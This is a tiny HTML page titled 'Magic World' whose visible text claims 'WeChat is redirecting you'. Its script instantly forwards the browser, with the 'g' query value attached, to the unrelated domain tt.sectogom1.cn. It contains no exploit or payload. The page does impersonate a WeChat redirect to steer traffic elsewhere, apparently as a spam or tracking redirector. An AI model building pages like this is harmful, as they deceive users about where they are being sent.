<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>魔法世界</title>
</head>
<body>
微信正努力为您跳转.....
<script type="application/javascript">

    var url = "http://tt.sectogom1.cn";


</script>

<script>

    function GetQueryString(name)
    {
        var reg = new RegExp("(^|&)"+ name +"=([^&]*)(&|$)");
        var r = window.location.search.substr(1).match(reg);
        if(r!=null) {
            return unescape(r[2]);
        }else {
            return '0';
        }
    }

    var g = GetQueryString("g");
    window.location.href = url + '?g=' + g;
//    var t = function(){
//        window.location.href = url + '?g=' + g;
//    }
//    setTimeout(t,10);

</script>

</body>
</html>

